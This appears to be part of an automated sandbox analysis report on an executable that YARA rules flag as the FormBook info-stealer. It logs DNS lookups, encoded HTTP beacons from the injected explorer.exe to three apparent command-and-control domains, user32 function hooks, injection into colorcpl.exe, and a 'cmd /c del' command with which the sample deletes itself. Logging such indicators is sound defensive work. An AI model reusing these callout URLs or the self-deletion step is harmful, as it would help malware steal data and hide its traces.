                                                  Apr 8, 2021 13:35:10.637531996 CEST5406453192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:10.650214911 CEST53540648.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:11.843425989 CEST5281153192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:11.856584072 CEST53528118.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:12.598376036 CEST5529953192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:12.611216068 CEST53552998.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:13.360012054 CEST6374553192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:13.372519970 CEST53637458.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:24.852718115 CEST5005553192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:24.865201950 CEST53500558.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:30.060302973 CEST6137453192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:30.078620911 CEST53613748.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:33.654170036 CEST5033953192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:33.666353941 CEST53503398.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:39.155509949 CEST6330753192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:39.168598890 CEST53633078.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:40.313941002 CEST4969453192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:40.327806950 CEST53496948.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:41.220237970 CEST5498253192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:41.233719110 CEST53549828.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:48.488136053 CEST5001053192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:48.500960112 CEST53500108.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:53.573227882 CEST6371853192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:53.681869030 CEST53637188.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:55.284838915 CEST6211653192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:55.297590017 CEST53621168.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:58.406585932 CEST6381653192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:58.459371090 CEST53638168.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:58.876475096 CEST5501453192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:58.966783047 CEST53550148.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:59.473614931 CEST6220853192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:59.486525059 CEST53622088.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:35:59.907555103 CEST5757453192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:35:59.920656919 CEST53575748.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:00.262378931 CEST5181853192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:00.275732040 CEST53518188.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:00.878953934 CEST5662853192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:01.038713932 CEST53566288.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:01.065257072 CEST6077853192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:01.091783047 CEST53607788.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:02.555521011 CEST5379953192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:02.648542881 CEST53537998.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:03.056687117 CEST5468353192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:03.069292068 CEST53546838.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:04.557338953 CEST5932953192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:04.575211048 CEST53593298.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:21.847208977 CEST6402153192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:21.955113888 CEST53640218.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:32.784015894 CEST5612953192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:32.797066927 CEST53561298.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:35.834227085 CEST5817753192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:35.848114014 CEST53581778.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:38.342951059 CEST5070053192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:38.369062901 CEST53507008.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:36:42.494777918 CEST5406953192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:36:42.770663023 CEST53540698.8.8.8192.168.2.6
                                                  Apr 8, 2021 13:37:03.305118084 CEST6117853192.168.2.68.8.8.8
                                                  Apr 8, 2021 13:37:03.327255964 CEST53611788.8.8.8192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Apr 8, 2021 13:36:21.847208977 CEST192.168.2.68.8.8.80x8727Standard query (0)www.gammacake.comA (IP address)IN (0x0001)
                                                  Apr 8, 2021 13:36:42.494777918 CEST192.168.2.68.8.8.80x6d75Standard query (0)www.dehaochu.comA (IP address)IN (0x0001)
                                                  Apr 8, 2021 13:37:03.305118084 CEST192.168.2.68.8.8.80x5a29Standard query (0)www.goproteinz.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Apr 8, 2021 13:36:21.955113888 CEST8.8.8.8192.168.2.60x8727No error (0)www.gammacake.comext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                  Apr 8, 2021 13:36:21.955113888 CEST8.8.8.8192.168.2.60x8727No error (0)ext-cust.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                  Apr 8, 2021 13:36:21.955113888 CEST8.8.8.8192.168.2.60x8727No error (0)ext-cust.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                  Apr 8, 2021 13:36:21.955113888 CEST8.8.8.8192.168.2.60x8727No error (0)ext-cust.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                  Apr 8, 2021 13:36:21.955113888 CEST8.8.8.8192.168.2.60x8727No error (0)ext-cust.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                  Apr 8, 2021 13:36:42.770663023 CEST8.8.8.8192.168.2.60x6d75No error (0)www.dehaochu.com23.82.149.10A (IP address)IN (0x0001)
                                                  Apr 8, 2021 13:37:03.327255964 CEST8.8.8.8192.168.2.60x5a29No error (0)www.goproteinz.comgoproteinz.comCNAME (Canonical name)IN (0x0001)
                                                  Apr 8, 2021 13:37:03.327255964 CEST8.8.8.8192.168.2.60x5a29No error (0)goproteinz.com34.102.136.180A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.gammacake.com
                                                  • www.dehaochu.com
                                                  • www.goproteinz.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.649746198.185.159.14480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 8, 2021 13:36:22.104038000 CEST5953OUTGET /riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls HTTP/1.1
                                                  Host: www.gammacake.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 8, 2021 13:36:22.279726982 CEST5955INHTTP/1.1 400 Bad Request
                                                  Cache-Control: no-cache, must-revalidate
                                                  Content-Length: 77564
                                                  Content-Type: text/html; charset=UTF-8
                                                  Date: Thu, 08 Apr 2021 11:36:22 UTC
                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                  Pragma: no-cache
                                                  Server: Squarespace
                                                  X-Contextid: DZ3FHij1/Py0LHiG9
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.64975223.82.149.1080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 8, 2021 13:36:42.935848951 CEST6000OUTGET /riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4ls HTTP/1.1
                                                  Host: www.dehaochu.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 8, 2021 13:36:43.108424902 CEST6001INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 08 Apr 2021 03:32:26 GMT
                                                  Content-Type: text/html;charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.64975334.102.136.18080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 8, 2021 13:37:03.341767073 CEST6002OUTGET /riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4ls HTTP/1.1
                                                  Host: www.goproteinz.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 8, 2021 13:37:03.521747112 CEST6003INHTTP/1.1 403 Forbidden
                                                  Server: openresty
                                                  Date: Thu, 08 Apr 2021 11:37:03 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 275
                                                  ETag: "606c6589-113"
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function NameHook TypeActive in Processes
                                                  PeekMessageAINLINEexplorer.exe
                                                  PeekMessageWINLINEexplorer.exe
                                                  GetMessageWINLINEexplorer.exe
                                                  GetMessageAINLINEexplorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
                                                  Function NameHook TypeNew Data
                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE8
                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE8
                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE8
                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE8

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:13:35:00
                                                  Start date:08/04/2021
                                                  Path:C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'
                                                  Imagebase:0x480000
                                                  File size:541184 bytes
                                                  MD5 hash:EF847F9FC2339B9470150FEF1105B5FE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Start time:13:35:12
                                                  Start date:08/04/2021
                                                  Path:C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe
                                                  Imagebase:0x800000
                                                  File size:541184 bytes
                                                  MD5 hash:EF847F9FC2339B9470150FEF1105B5FE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:13:35:14
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff6f22f0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:13:35:28
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\colorcpl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                  Imagebase:0x1a0000
                                                  File size:86528 bytes
                                                  MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:13:35:33
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:13:35:33
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >